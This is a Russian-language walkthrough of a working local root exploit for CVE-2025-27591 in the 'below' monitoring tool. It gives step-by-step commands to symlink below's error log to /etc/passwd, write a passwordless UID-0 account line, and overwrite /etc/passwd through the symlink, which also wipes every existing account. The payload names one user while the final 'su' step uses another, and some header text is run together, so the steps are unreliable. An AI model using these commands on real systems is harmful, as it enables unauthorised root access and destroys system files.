
CVE-2025-27591 — известная уязвимость повышения привилегий в сервисе Below (версия < v0.9.0)
belowЭто простой эксплойт для CVE-2025-27591 — уязвимости локального повышения привилегий в инструменте мониторинга Linux below. Уязвимость затрагивает версии до v0.9.0 и связана с некорректными назначениями прав доступа в системе. Проблема была обнаружена в январе 2025 года и публично раскрыта 12 марта 2025 года (SecurityOnline, OpenWall). При запуске below с sudo ошибки могут записываться в общедоступный для записи каталог (/var/log/below), что позволяет злоумышленникам создавать симлинк на чувствительные цели, такие как /etc/passwd.
Используя это, непривилегированный пользователь с доступом к below через sudo может повысить привилегии до root.
belowbelow record/var/log/below/error_root.log/var/log/below доступен для записи всем пользователямsudo /usr/bin/below record без пароля✅ Шаг 1: Проверьте, что каталог журнала доступен для записи всем Вы должны увидеть:
drwxrwxrwx 2 root root 4096 ... /var/log/below

✅ Шаг 2: Удалите существующий error_root.log
rm -f /var/log/below/error_root.log
✅ Шаг 3: Создайте симлинк на /etc/passwd
ln -s /etc/passwd /var/log/below/error_root.log
затем проверьте с помощью
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd

✅ Шаг 4: Создайте файл полезной нагрузки Это добавит нового root-пользователя attacker без пароля:
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
структура файла
username:password:UID:GID:comment(home/full name):home_directory:shell
ключевой момент здесь — UID и GUID мы устанавливаем UID и GUID в 0, что делает пользователя root-пользователем, а Group ID = root-группа

✅ Шаг 5: Вызовите запись журнала от имени root Это ядро эксплойта.
sudo /usr/bin/below record
Эта команда, как ожидается, завершится ошибкой или по тайм-ауту — но она попытается записать журнал ошибок в /var/log/below/error_root.log, который на самом деле является /etc/passwd. 💡 В некоторых случаях этого может быть достаточно для повреждения /etc/passwd — поэтому далее мы полностью перезаписываем его.
✅ Шаг 6: Перезапишите /etc/passwd через симлинк
cp /tmp/payload /var/log/below/error_root.log

✅ Шаг 7: Станьте root
su attacker
Вы попадёте в root-оболочку, пароль не нужен.

python3 dbs_exploit.py
